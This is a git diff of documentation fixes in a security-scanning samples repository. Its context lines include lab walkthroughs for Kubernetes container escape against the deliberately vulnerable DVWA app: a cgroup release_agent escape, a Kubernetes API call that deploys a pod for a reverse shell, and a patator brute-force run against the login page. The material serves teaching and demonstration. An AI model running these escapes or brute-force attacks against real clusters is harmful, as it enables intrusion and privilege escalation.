diff --git a/.github/actions/spelling/expect.txt b/.github/actions/spelling/expect.txt index e69de29..7a8b71f 100644 --- a/.github/actions/spelling/expect.txt +++ b/.github/actions/spelling/expect.txt @@ -0,0 +1,54 @@ +akic +baf +cgrp +chronos +cpe +cqc +dfdaf +dvwa +eecdfd +fjw +fzvkw +Gci +hnlj +hostpid +hushlogin +IBAA +icanhazip +Ikp +JFUz +Jhb +kalilinux +kbcxs +kvct +Kyybse +lhost +linux +lport +messagebus +meterpreter +MIIJKg +msfconsole +nch +NCIs +ndots +nginx +noproxy +Perfetto +pfuj +pmuench +procs +rdm +rhel +rkd +secops +Thu +timesync +umxf +unminimize +unnyfkbt +upperdir +vmss +webserver +xdsp +XVCJ diff --git a/.github/actions/spelling/patterns.txt b/.github/actions/spelling/patterns.txt index 7eb4c3c..61cbc42 100644 --- a/.github/actions/spelling/patterns.txt +++ b/.github/actions/spelling/patterns.txt @@ -89,3 +89,9 @@ aws_secret_access_key\s+\=(\s+)?.+ # score score is valid in MQL docs score score + +# SHA256 values +\nSHA256:\S* + +# long cert lines in config +\bcluster_certificate_authority_data = .* diff --git a/README.md b/README.md index 3917709..21e7c16 100644 --- a/README.md +++ b/README.md 
@@ -3,7 +3,7 @@ ![samples light-mode illustration](.github/social/preview_light.jpg#gh-light-mode-only) ![samples dark-mode illustration](.github/social/preview_dark.jpg#gh-dark-mode-only) -Welcome to our comprehensive security scanning repository! In our ongoing effort to empower the highest standards of security, we've gathered a variety of examples and guides to help you conduct thorough security audits on your resources using `cnspec`, `cnquery`, and the Mondoo Platform. Our examples, ranging from AWS services to GitHub repositories, are structured with a clear overview, prerequisites, step-by-step instructions, expected results, and troubleshooting tips. We trust these will serve as a beneficial starting point for your own security scanning needs. +Welcome to our comprehensive security scanning repository! In our ongoing effort to empower the highest standards of security, we've gathered a variety of examples and guides to help you conduct thorough security audits on your resources using `cnspec`, `cnquery`, and Mondoo Platform. Our examples, ranging from AWS services to GitHub repositories, are structured with a clear overview, prerequisites, step-by-step instructions, expected results, and troubleshooting tips. We trust these will serve as a beneficial starting point for your own security scanning needs. - [What are cnspec, cnquery, and Mondoo Platform?](#what-are-cnspec-cnquery-and-mondoo-platform) - [AWS](#aws) 
@@ -11,11 +11,11 @@ Welcome to our comprehensive security scanning repository! In our ongoing effort - [Checking Public Exposure of AWS S3 Buckets with cnspec](#checking-public-exposure-of-aws-s3-buckets-with-cnspec) - [Verifying MFA Status for AWS IAM Users](#verifying-mfa-status-for-aws-iam-users) - [Scanning an AWS EC2 Instance with cnspec using EC2 Instance Connect](#scanning-an-aws-ec2-instance-with-cnspec-using-ec2-instance-connect) - - [Playing with AWS EC2 Instances](#playing-with-aws-ec2-instances) - [GitHub](#github) - [Performing CIS GitHub Supply Chain Benchmark with cnspec](#performing-cis-github-supply-chain-benchmark-with-cnspec) - [Hack Lab](#hack-lab) - [Demonstrating Container Escape in Kubernetes](#demonstrating-container-escape-in-kubernetes) +- [Playing with AWS EC2 Instances](#playing-with-aws-ec2-instances) - [Contributing](#contributing) ## What are cnspec, cnquery, and Mondoo Platform? @@ -24,7 +24,7 @@ Welcome to our comprehensive security scanning repository! In our ongoing effort `cnquery` is another versatile command-line tool that facilitates advanced querying against your infrastructure data, allowing you to understand and manage your infrastructure more effectively. -The Mondoo Platform is a cloud-native, security and compliance automation platform that enables businesses to secure their infrastructure continuously and at scale. +Mondoo Platform is a cloud-native, security and compliance automation platform that enables businesses to secure their infrastructure continuously and at scale. Together, these provide a comprehensive approach to managing and maintaining the security posture of your systems. 
@@ -66,7 +66,7 @@ This guide walks you through conducting a security scan on an AWS EC2 instance u ### Performing CIS GitHub Supply Chain Benchmark with cnspec -This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. +This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo Platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. ![cnspec running a GitHub organization scan](./github/cis-supply-chain/github-supply-chain.gif) 
@@ -78,16 +78,16 @@ The Hack Lab is a collection of vulnerable systems that can be used to learn and ### Demonstrating Container Escape in Kubernetes -This houses demonstration scenarios showcasing container escapes in Kubernetes environments, particularly in AKS (Azure Kubernetes Service), EKS (Amazon Elastic Kubernetes Service) and GKE (Google Kontainer Engine). These scenarios can serve as engaging demonstrations using Mondoo. +This houses demonstration scenarios showcasing container escapes in Kubernetes environments, particularly in AKS (Azure Kubernetes Service), EKS (Amazon Elastic Kubernetes Service) and GKE (Google Container Engine). These scenarios can serve as engaging demonstrations using Mondoo. - [Instructions](./hacklab/container-escape/) ## Playing with AWS EC2 Instances -The AWS EC2 Instances is a terraform to deploy hardend and not hardend Windows as well as Linux systems. +The AWS EC2 Instances is a terraform to deploy hardened and not hardened Windows as well as Linux systems. - [Instructions](./aws/ec2-instance/) ## Contributing -We welcome contributions! Feel free to submit pull requests for new examples or improvements to existing ones. If you encounter any issues or have questions, please open an issue in this repository or join our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +We welcome contributions! Feel free to submit pull requests for new examples or improvements to existing ones. If you encounter any issues or have questions, please open an issue in this repository or join our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/cis-benchmark/README.md b/aws/cis-benchmark/README.md index 0a601b4..4cd93b9 100644 --- a/aws/cis-benchmark/README.md +++ b/aws/cis-benchmark/README.md 
@@ -32,4 +32,4 @@ This command instructs `cnspec` to scan your AWS environment using the CIS Amazo - **AWS CLI**: Ensure that AWS CLI is installed and configured correctly. Verify that you are using the correct AWS credentials. If you encounter permission errors, check your AWS IAM role and permissions. - **Benchmark execution issues**: If the benchmark does not execute as expected, ensure that you have the necessary permissions to access all resources in your AWS account. -If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/ec2-instance-connect/README.md b/aws/ec2-instance-connect/README.md index ee612fb..96c4286 100644 --- a/aws/ec2-instance-connect/README.md +++ b/aws/ec2-instance-connect/README.md 
@@ -44,4 +44,4 @@ This command executes a security scan on your EC2 instance. - **AWS CLI and EC2 Instance Connect**: Ensure the latest AWS CLI is installed and configured correctly. Verify that you are using the correct region, availability zone, and instance ID. If you encounter permission errors, check your AWS IAM role and permissions. - **SSH connection issues**: If you cannot connect to your EC2 instance, make sure you are using the correct username (usually "ec2-user" for Amazon Linux instances). -For more complex or ongoing issues, feel free to participate in our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +For more complex or ongoing issues, feel free to participate in our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/ec2-instances/README.md b/aws/ec2-instances/README.md index 1a98b34..fb57115 100644 --- a/aws/ec2-instances/README.md +++ b/aws/ec2-instances/README.md 
@@ -37,8 +37,8 @@ This repository contains Terraform code for provisioning AWS EC2 instances for t | Oracle 8 cnspec | Latest Oracle 8 image with latest cnspec | `create_oracle8_cnspec` | | | Oracle 8 CIS | CIS Oracle Linux 8 Benchmark - Level 1 | `create_oracle8_cis` | [CIS Oracle Linux 8 Benchmark - Level 1](https://aws.amazon.com/marketplace/pp/prodview-qohiqfju7iecs?sr=0-1&ref_=beagle&applicationId=AWSMPContessa) | | Oracle 8 CIS cnspec | CIS Oracle Linux 8 Benchmark - Level 1 with latest cnspec | `create_oracle8_cis_cnspec` | [CIS Oracle Linux 8 Benchmark - Level 1](https://aws.amazon.com/marketplace/pp/prodview-qohiqfju7iecs?sr=0-1&ref_=beagle&applicationId=AWSMPContessa) | -| RHEL 8 | Latest RedHat Enterprise Linux 8 | `create_rhel8` | | -| RHEL 8 cnspec | Latest RedHat Enterprise Linux 8 with latest cnspec | `create_rhel8_cnspec` | | +| RHEL 8 | Latest Red Hat Enterprise Linux 8 | `create_rhel8` | | +| RHEL 8 cnspec | Latest Red Hat Enterprise Linux 8 with latest cnspec | `create_rhel8_cnspec` | | | RHEL 8 CIS | CIS Red Hat Enterprise Linux 8 STIG Benchmark | `create_rhel8_cis` | [CIS Red Hat Enterprise Linux 8 STIG Benchmark](https://aws.amazon.com/marketplace/pp/prodview-ia2nfuoig3jmu?sr=0-3&ref_=beagle&applicationId=AWSMPContessa) | | RHEL 8 CIS cnspec | CIS Red Hat Enterprise Linux 8 STIG Benchmark with latest cnspec | `create_rhel8_cis_cnspec` | [CIS Red Hat Enterprise Linux 8 STIG Benchmark](https://aws.amazon.com/marketplace/pp/prodview-ia2nfuoig3jmu?sr=0-3&ref_=beagle&applicationId=AWSMPContessa) | | RHEL 9 | Latest RHEL 9 image | `create_rhel9` | | diff --git a/aws/iam-mfa/README.md b/aws/iam-mfa/README.md index 4190c89..c23cdc2 100644 --- a/aws/iam-mfa/README.md +++ b/aws/iam-mfa/README.md 
@@ -32,4 +32,4 @@ The output will be a list of IAM usernames with a check on whether MFA is enable - **AWS CLI**: Ensure that AWS CLI is installed and configured correctly. Verify that you are using the correct AWS credentials. If you encounter permission errors, check your AWS IAM role and permissions. - **Policy execution issues**: If the policy does not execute as expected, ensure that you have the necessary permissions to access all resources in your AWS account. -Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this Github repository. For ongoing issues or broader discussions, we invite you to join us over at our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this GitHub repository. For ongoing issues or broader discussions, we invite you to join us over at our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/public-s3/README.md b/aws/public-s3/README.md index 9a6178d..e5dc08d 100644 --- a/aws/public-s3/README.md +++ b/aws/public-s3/README.md @@ -7,7 +7,7 @@ This example uses `cnspec` to check for publicly exposed AWS S3 buckets within y ## Pre-requisites - You should have an AWS account and the necessary credentials (Access Key ID and Secret Access Key) available. -- Install cnspec following the instructions provided at the installation page of the cnspec Github repository. +- Install cnspec following the instructions provided at the installation page of the cnspec GitHub repository. ## Instructions 
@@ -35,4 +35,4 @@ If you encounter any issues while running the scan: - **`cnspec` Installation Issues:** If you have trouble installing cnspec, ensure you're following the instructions on the installation page correctly. -Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this Github repository. For ongoing issues or broader discussions, we invite you to join us over at our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this GitHub repository. For ongoing issues or broader discussions, we invite you to join us over at our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/azure/README.md b/azure/README.md index 9666de9..fcd975b 100644 --- a/azure/README.md +++ b/azure/README.md @@ -46,7 +46,7 @@ terraform apply -auto-approve plan.out ### Connect to VM using `xfreerdp` from Ubuntu -Run the following command to see the the connection details (including sensitive values) +Run the following command to see the connection details (including sensitive values) ```bash terraform output -raw summary diff --git a/gcp/cis-benchmark/README.md b/gcp/cis-benchmark/README.md index 53574ba..981ed83 100644 --- a/gcp/cis-benchmark/README.md +++ b/gcp/cis-benchmark/README.md @@ -7,7 +7,7 @@ This guide provides an example on how to scan a GCP project against the CIS Goog ## Pre-requisites - You should have the `cnspec` installed. You can follow the [installation instructions](https://github.com/mondoohq/cnspec#installation) to set it up. -- You need an Google Cloud service account account and the necessary permissions. +- You need an Google Cloud service account and the necessary permissions. - The Google Cloud SDK installed and configured with access to the project you wish to scan. ## Instructions 
@@ -32,4 +32,4 @@ This command instructs `cnspec` to scan a Google Cloud project using the CIS Goo - **gcloud SDK CLI**: Ensure that `gcloud` CLI is [installed and configured](https://cloud.google.com/sdk/docs/install-sdk) correctly. Verify that you are using the correct account or service account credentials. If you encounter permission errors, check your IAM role and permissions. - **Benchmark execution issues**: If the benchmark does not execute as expected, ensure that you have the necessary permissions to access all resources in your Google Cloud project. -If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/github/cis-supply-chain/README.md b/github/cis-supply-chain/README.md index a3a4241..518ebad 100644 --- a/github/cis-supply-chain/README.md +++ b/github/cis-supply-chain/README.md 
@@ -4,11 +4,11 @@ ## Overview -This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. +This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo Platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. ## Pre-requisites -- Mondoo Space: Create a new space on the Mondoo platform and activate the 'CIS GitHub Benchmark - Level 1' benchmark in the Security Registry. +- Mondoo Space: Create a new space on Mondoo Platform and activate the 'CIS GitHub Benchmark - Level 1' benchmark in the Security Registry. - `cnspec` Login: Authenticate with your newly created Mondoo space using `cnspec login -t ` . - Organization Access: Ensure you have access to the target GitHub organization, for example https://github.com/lunalectric. - GitHub Token: Generate a GitHub token with Resource owner set to lunalectric and all permissions set to read. 
@@ -57,4 +57,4 @@ If you encounter any issues while performing these steps: - Permission Issues: Verify that you have the necessary permissions to access and scan the GitHub organization or repositories. This may involve checking the settings of your GitHub token and your role within the organization. - Command Execution Issues: If the `cnspec`` commands are not executing as expected, ensure that cnspec is installed and updated to the latest version. -Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this Github repository. For ongoing issues or broader discussions, we invite you to join us over at our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this GitHub repository. For ongoing issues or broader discussions, we invite you to join us over at our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/hack-lab/container-escape/aws/README.md b/hack-lab/container-escape/aws/README.md index c704d3b..e90b06c 100644 --- a/hack-lab/container-escape/aws/README.md +++ b/hack-lab/container-escape/aws/README.md 
@@ -13,12 +13,14 @@ This folder contains Terraform automation code to provision the following: - [EKS container escape demo](#eks-container-escape-demo) - - [Prerequsites](#prerequsites) + - [Prerequisites](#prerequisites) - [Configuration](#configuration) - [Example configuration](#example-configuration) - [Provision the cluster](#provision-the-cluster) - [Connect to the cluster](#connect-to-the-cluster) - - [Deploy Mondoo Operator to AKS](#deploy-mondoo-operator-to-aks) + - [Deploy Mondoo Operator to EKS](#deploy-mondoo-operator-to-eks) + - [Deploy cert-manager](#deploy-cert-manager) + - [Deploy Mondoo Operator](#deploy-mondoo-operator) - [Deploy and configure DVWA](#deploy-and-configure-dvwa) - [Configure Port Forwarding](#configure-port-forwarding) - [Login to DVWA](#login-to-dvwa) 
@@ -26,15 +28,29 @@ This folder contains Terraform automation code to provision the following: - [Start the container listener](#start-the-container-listener) - [Start the host listener](#start-the-host-listener) - [Start Ruby webserver](#start-ruby-webserver) - - [Escape time](#escape-time) - - [Escalate Privileges on the container](#escalate-privileges-on-the-container) + - [Escape time via privileged container](#escape-time-via-privileged-container) + - [Escalate privileges on the container](#escalate-privileges-on-the-container) - [Gain access to worker nodes](#gain-access-to-worker-nodes) + - [Escape time via service account token](#escape-time-via-service-account-token) + - [Start the container listener](#start-the-container-listener-1) + - [Start the host listener](#start-the-host-listener-1) + - [Start the host listener](#start-the-host-listener-2) + - [Start Ruby webserver](#start-ruby-webserver-1) + - [Gain access to worker nodes through default service account token](#gain-access-to-worker-nodes-through-default-service-account-token) - [Mondoo scan commands](#mondoo-scan-commands) + - [Scan kubernetes manifest](#scan-kubernetes-manifest) + - [Scan container image from registry](#scan-container-image-from-registry) + - [Scan Kubernetes EKS cluster](#scan-kubernetes-eks-cluster) + - [Shell to Kubernetes EKS cluster](#shell-to-kubernetes-eks-cluster) +- [scan/shell kubernetes node via SSM](#scanshell-kubernetes-node-via-ssm) +- [scan/shell Kubernetes via AWS API](#scanshell-kubernetes-via-aws-api) - [Destroy the cluster](#destroy-the-cluster) + - [License and Author](#license-and-author) + - [Disclaimer](#disclaimer) -## Prerequsites +## Prerequisites - [AWS Account](https://aws.amazon.com/free/) - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) - `~> aws-cli/2.4.28` 
@@ -269,7 +285,7 @@ Events: Normal Started 23s kubelet Started container dvwa ``` -Deploy also the DVWA WebApp as a none privileged container and the the malicous role binding +Deploy also the DVWA WebApp as a none privileged container and the malicious role binding ```bash kubectl apply -f ../assets/dvwa-deployment-no-privileged.yml @@ -310,7 +326,7 @@ Log in to DVWA using `admin` with the password `password`. ![Reset the Database](../assets/dvwa_db_reset.png) -Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." Next, open three command line terminals and continue the setup process. @@ -444,7 +460,7 @@ uid=33(www-data) gid=33(www-data) groups=33(www-data) You have a shell and are the `www-data` user. -### Escalate Privileges on the container +### Escalate privileges on the container Now you need do the privilege escalation within the container to gain root. In the terminal where the container listener and run the following commands: @@ -721,13 +737,13 @@ cnspec scan k8s --path ../assets/dvwa-deployment.yml cnspec scan container docker.io/pmuench/dvwa-container-escape:latest ``` -### Scan kubernetes eks cluster +### Scan Kubernetes EKS cluster ```bash cnspec scan k8s ``` -### Shell to kubernetes eks cluster +### Shell to Kubernetes EKS cluster ```bash cnspec shell k8s @@ -793,7 +809,7 @@ cnspec scan aws ec2 ssm ssm-user@ cnspec shell aws ec2 ssm ssm-user@ ``` -# scan/shell kubernetes via aws api +# scan/shell Kubernetes via AWS API ```bash export AWS_REGION=us-east-2 diff --git a/hack-lab/container-escape/azure/README.md b/hack-lab/container-escape/azure/README.md index cc2be79..4c2590a 100644 --- a/hack-lab/container-escape/azure/README.md +++ b/hack-lab/container-escape/azure/README.md 
@@ -12,7 +12,7 @@ This folder contains Terraform automation code to provision the following: - [AKS container escape demo](#aks-container-escape-demo) - - [Prerequsites](#prerequsites) + - [Prerequisites](#prerequisites) - [Provision the cluster](#provision-the-cluster) - [Connect to the cluster](#connect-to-the-cluster) - [Deploy Mondoo Operator to AKS](#deploy-mondoo-operator-to-aks) @@ -26,8 +26,12 @@ This folder contains Terraform automation code to provision the following: - [Start the host listener](#start-the-host-listener) - [Start Ruby webserver](#start-ruby-webserver) - [Escape time](#escape-time) - - [Escalate Privileges on the container](#escalate-privileges-on-the-container) - - [Gain access to worker nodes (Escaping the pod and getting a shell on the worker node)](#gain-access-to-worker-nodes) + - [Escalate privileges on the container](#escalate-privileges-on-the-container) + - [Gain access to worker nodes (Escaping the pod and getting a shell on the worker node)](#gain-access-to-worker-nodes-escaping-the-pod-and-getting-a-shell-on-the-worker-node) + - [1. Using ServiceAccount](#1-using-serviceaccount) + - [2. Release\_agent cgroups escape](#2-release_agent-cgroups-escape) + - [3. Cronjob](#3-cronjob) + - [Get keys from keyvault](#get-keys-from-keyvault) - [Mondoo scan commands](#mondoo-scan-commands) - [Scan kubernetes manifest](#scan-kubernetes-manifest) - [Scan container image from registry](#scan-container-image-from-registry) @@ -41,7 +45,7 @@ This folder contains Terraform automation code to provision the following: -## Prerequsites +## Prerequisites - [Azure Account](https://azure.microsoft.com/en-us/free/) - [AZ CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli) 
@@ -262,7 +266,7 @@ Log in to DVWA using `admin` with the password `password`. ![Reset the Database](../assets/dvwa_db_reset.png) -Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." Next, open three command line terminals and continue the setup process. @@ -401,7 +405,7 @@ uid=33(www-data) gid=33(www-data) groups=33(www-data) You have a shell and are the `www-data` user. -### Escalate Privileges on the container +### Escalate privileges on the container Now you need do the privilege escalation within the container to gain root. In the terminal where the container listener and run the following commands: @@ -462,17 +466,15 @@ In the outcome we can see the containerd which shows we are in a container (cont b. To check is if we are in a privileged container, we can check if we have access to a lot of devices. - ```bash - +```bash fdisk -l - ```` ```bash ls /dev/ ```` -There are several ways of escaping the container and land in the workernode which some of them might not work as kubernetes orchestration is keep updating in Azure. Here, we are trying three ways, which two of them is not working anymore in the new Kubernetes version (latest version deployed by terraform starting from May 2023): +There are several ways of escaping the container and land in the worker node which some of them might not work as kubernetes orchestration is keep updating in Azure. Here, we are trying three ways, which two of them is not working anymore in the new Kubernetes version (latest version deployed by terraform starting from May 2023): ### 1. Using ServiceAccount 
@@ -534,7 +536,7 @@ kubectl --token=`cat /run/secrets/kubernetes.io/serviceaccount/token` --certific no ``` -So, here wo donot have enough permissions and a result we cannot create a new pod from within this pod by calling the API. If we had enough permissions by getting simply 'yes' from above query, we could use following to create a pod and at the same listening on the port 4244 to get a reverse shell: +So, here we don't have enough permissions and a result we cannot create a new pod from within this pod by calling the API. If we had enough permissions by getting simply 'yes' from above query, we could use following to create a pod and at the same listening on the port 4244 to get a reverse shell: ```bash curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X POST ${APISERVER}/apis/apps/v1/namespaces/default/deployments -H 'Content-Type: application/yaml' -d '--- @@ -583,7 +585,7 @@ chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` -We can confirm that it did not work in the new version of the kubernets in Azure, and most probably it should be related to the fact that cgroup exploit was mainly related to the Docker and not the containerd! +We can confirm that it did not work in the new version of the Kubernetes in Azure, and most probably it should be related to the fact that cgroup exploit was mainly related to the Docker and not the containerd! ### 3. Cronjob diff --git a/hack-lab/container-escape/gcp/README.md b/hack-lab/container-escape/gcp/README.md index 457d62f..4f4b9e0 100644 --- a/hack-lab/container-escape/gcp/README.md +++ b/hack-lab/container-escape/gcp/README.md 
@@ -12,7 +12,7 @@ This folder contains Terraform automation code to provision the following: - [GKE container escape demo](#gke-container-escape-demo) - - [Prerequsites](#prerequsites) + - [Prerequisites](#prerequisites) - [Provision the cluster](#provision-the-cluster) - [Connect to the cluster](#connect-to-the-cluster) - [Deploy Mondoo Operator to GKE](#deploy-mondoo-operator-to-gke) 
@@ -23,26 +23,27 @@ This folder contains Terraform automation code to provision the following: - [Login to DVWA](#login-to-dvwa) - [Setup Attacker Linux Instance](#setup-attacker-linux-instance) - [Start the container listener](#start-the-container-listener) - - [Start the host listener](#start-the-host-listener) - [Start Ruby webserver](#start-ruby-webserver) + - [Determine the attacker machine's public IP](#determine-the-attacker-machines-public-ip) + - [Escape time](#escape-time) - [Escaping the pod and get a shell on the node (google compute instance)](#escaping-the-pod-and-get-a-shell-on-the-node-google-compute-instance) - [Enumerate Privileges of the service account running the container](#enumerate-privileges-of-the-service-account-running-the-container) - [Deploy a pod that will get you a `root` account on the node](#deploy-a-pod-that-will-get-you-a-root-account-on-the-node) - - [Gaining a persistant bash shell on the node](#gaining-a-persistant-bash-shell-on-the-node) + - [Gaining a persistent bash shell on the node](#gaining-a-persistent-bash-shell-on-the-node) - [Mondoo scan commands](#mondoo-scan-commands) - [Scan kubernetes manifest](#scan-kubernetes-manifest) - [Scan container image from registry](#scan-container-image-from-registry) - - [Scan kubernetes gke cluster](#scan-kubernetes-gke-cluster) - - [Shell to kubernetes gke cluster](#shell-to-kubernetes-gke-cluster) - - [Scan a google cloud project](#scan-a-google-cloud-project) - - [Shell to google cloud project](#shell-to-google-cloud-project) + - [Scan Kubernetes GKE cluster](#scan-kubernetes-gke-cluster) + - [Shell to Kubernetes GKE cluster](#shell-to-kubernetes-gke-cluster) + - [Scan a Google Cloud project](#scan-a-google-cloud-project) + - [Shell to a Google Cloud project](#shell-to-a-google-cloud-project) - [Destroy the cluster](#destroy-the-cluster) - [License and Author](#license-and-author) - [Disclaimer](#disclaimer) -## Prerequsites +## Prerequisites - [Google GCP 
Account](https://cloud.google.com/free/) - make sure you to give the account your login in with the following IAM role [here](https://console.cloud.google.com/iam-admin): @@ -68,19 +69,19 @@ This folder contains Terraform automation code to provision the following: - make sure to install the [gke-gcloud-auth-plugin](https://cloud.google.com/blog/products/containers-kubernetes/kubectl-auth-changes-in-gke), usually via the command: - ``` + ```bash gcloud components install gke-gcloud-auth-plugin ``` - - make sure to login to you Google Cloud Account account via: + - make sure to login to you Google Cloud account via: - ``` + ```bash gcloud auth application-default login ``` - make sure to set gcloud CLI to the right project - ``` + ```bash gcloud config set project #e.g. my-test-project ``` @@ -97,25 +98,25 @@ git clone git@github.com:Lunalectric/container-escape.git 2. cd into the terraform folder -``` +```bash cd container-escape/gke ``` 3. Initialize the project (download modules) -``` +```bash terraform init ``` 4. Check that everything is ready (and safe plan to a local file) -``` +```bash terraform plan -out plan.out ``` 5. Apply the configuration -``` +```bash terraform apply plan.out -auto-approve ``` @@ -269,7 +270,7 @@ Log in to DVWA using `admin` with the password `password`. ![Reset the Database](../assets/dvwa_db_reset.png) -Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." Next, open three command line terminals and continue the setup process. 
@@ -346,7 +347,7 @@ root@attacker:~/container-escape# ./start_ruby_webserver [2022-08-15 18:28:35] INFO WEBrick::HTTPServer#start: pid=3850 port=8001 ``` -### Find out the attacker machines public IP: +### Determine the attacker machine's public IP ```bash root@lunalectric-attacker-vm-3v0c:~# cat container-escape/pub-ip @@ -472,7 +473,7 @@ curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata gke-lunalectric-gke--lunalectric-pool-0e144d64-33rz.us-central1-f.c.-development-3.internal ``` -## Gaining a persistant bash shell on the node +## Gaining a persistent bash shell on the node **Confirming the hostname and IP address of the node** First we need to find out on which node we are operating. @@ -650,13 +651,13 @@ cnspec scan k8s --path ../assets/dvwa-deployment-no-privileged.yml cnspec scan container docker.io/pmuench/dvwa-container-escape:latest ``` -### Scan kubernetes gke cluster +### Scan Kubernetes GKE cluster ```bash cnspec scan k8s ``` -### Shell to kubernetes gke cluster +### Shell to Kubernetes GKE cluster ```bash cnspec shell k8s diff --git a/hack-lab/container-escape/minikube/README.md b/hack-lab/container-escape/minikube/README.md index f823ae1..4ab9c0d 100644 --- a/hack-lab/container-escape/minikube/README.md +++ b/hack-lab/container-escape/minikube/README.md @@ -7,7 +7,7 @@ This folder contains Terraform automation code to provision the following: - **Ubuntu 20.04 AWS EC2 Instance** - This instance is provisioned for the minikube and to demonstrate the container escape - **Windows 2016** - This instance is provisioned for the demonstration of the Windows Hack and Printnightmare vulnerability. (ami-0808d6a0d91e57fd3 in eu-central-1) -### Prerequsites +### Prerequisites - [AWS Account](https://aws.amazon.com/free/) - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) - `~> aws-cli/2.4.28` 
diff --git a/hack-lab/container-escape/minikube/output.tf b/hack-lab/container-escape/minikube/output.tf index d3ba231..d5795ad 100644 --- a/hack-lab/container-escape/minikube/output.tf +++ b/hack-lab/container-escape/minikube/output.tf @@ -46,7 +46,7 @@ ubuntu@ip-10-0-4-175:~$ kubectl apply -f dvwa-deployment.yaml - check and configure the DVWA (login: admin/password) - Open a browser and navigate to http://${module.ubuntu-k8s-instance.public_ip}:8080. - Log in to DVWA using `admin` with the password `password`. -- Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +- Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." - Next, open three command line terminals and continue the setup process. - get the POD name @@ -135,7 +135,7 @@ SESSIONID=$(grep PHPSESSID dvwa.cookie | cut -d $'\t' -f7) patator http_fuzz 1=/usr/share/wordlists/metasploit/http_default_users.txt 0=/usr/share/wordlists/metasploit/http_default_pass.txt --threads=8 timeout=1 --rate-limit=1 url="http://${module.ubuntu-k8s-instance.private_ip}:8080/login.php" method=POST body="username=FILE1&password=FILE0&user_token=$\{CSRF}&Login=Login" header="Cookie: PHPSESSID=$\{SESSIONID}" -x ignore:fgrep=login.php -x quit:fgrep=index.php follow=0 accept_cookie=0 09:01:15 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.10 at 2022-06-03 09:01 UTC -09:01:15 patator INFO - +09:01:15 patator INFO - 09:01:15 patator INFO - code size:clen time | candidate | num | mesg 09:01:15 patator INFO - ----------------------------------------------------------------------------- 09:01:17 patator INFO - 302 424:0 0.012 | password:admin | 15 | HTTP/1.1 302 Found 
